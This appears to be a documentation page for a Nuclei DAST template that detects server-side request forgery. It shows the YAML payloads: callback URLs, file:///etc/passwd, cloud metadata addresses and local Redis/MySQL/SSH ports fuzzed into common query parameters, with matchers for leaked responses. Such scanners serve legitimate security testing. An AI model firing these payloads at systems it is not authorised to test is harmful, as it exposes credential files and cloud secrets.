Full Response SSRF Detection
ID: response-ssrf
Severity: high
Author: pdteam,pwnhxl,j4vaovo,AmirHossein Raeisi
Tags: ssrf,dast
Description
Section titled “Description”YAML Source
Section titled “YAML Source”id: response-ssrf
info: name: Full Response SSRF Detection author: pdteam,pwnhxl,j4vaovo,AmirHossein Raeisi severity: high reference: - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py metadata: max-request: 12 tags: ssrf,dast
http: - pre-condition: - type: dsl dsl: - 'method == "GET"'
payloads: ssrf: - 'http://{{interactsh-url}}' - 'http://{{FQDN}}.{{interactsh-url}}' - 'http://{{FQDN}}@{{interactsh-url}}' - 'http://{{interactsh-url}}#{{FQDN}}' - 'http://{{RDN}}.{{interactsh-url}}' - 'http://{{RDN}}@{{interactsh-url}}' - 'http://{{interactsh-url}}#{{RDN}}' - 'file:////./etc/./passwd' - 'file:///c:/./windows/./win.ini' - 'http://metadata.tencentyun.com/latest/meta-data/' - 'http://100.100.100.200/latest/meta-data/' - 'http://169.254.169.254/latest/meta-data/' - 'http://169.254.169.254/metadata/v1' - 'http://127.0.0.1:22' - 'http://127.0.0.1:3306' - 'dict://127.0.0.1:6379/info'
fuzzing: - part: query mode: single keys: - callback - continue - data - dest - dir - domain - feed - file - host - html - imgurl - navigation - next - open - out - page - path - port - redirect - reference - return - show - site - to - uri - url - val - validate - view - window fuzz: - "{{ssrf}}"
- part: query mode: single values: - "(https|http|file)(%3A%2F%2F|://)(.*?)" fuzz: - "{{ssrf}}"
stop-at-first-match: true matchers-condition: or matchers:
- type: word part: body words: - "Interactsh Server"
- type: regex part: body regex: - 'SSH-(\d.\d)-OpenSSH_(\d.\d)'
- type: regex part: body regex: - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)'
- type: regex part: body regex: - '(\d.\d.\d)(.*?)mysql_native_password'
- type: regex part: body regex: - 'root:.*?:[0-9]*:[0-9]*:'
- type: word part: body words: - 'for 16-bit app support'
- type: regex part: body regex: - 'dns-conf\/[\s\S]+instance\/'
- type: regex part: body regex: - 'app-id[\s\S]+placement\/'
- type: regex part: body regex: - 'ami-id[\s\S]+placement\/'
- type: regex part: body regex: - 'id[\s\S]+interfaces\/'# digest: 4a0a0047304502202fde4bfa65da3bf0c55b9b438cd860494fbd0663a658a93ecacfa6f796104b560221008a0a57e62fa458121b54a0aca4e8ce18ad30806a2680549345df96912af33d18:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "dast/vulnerabilities/ssrf/response-ssrf.yaml"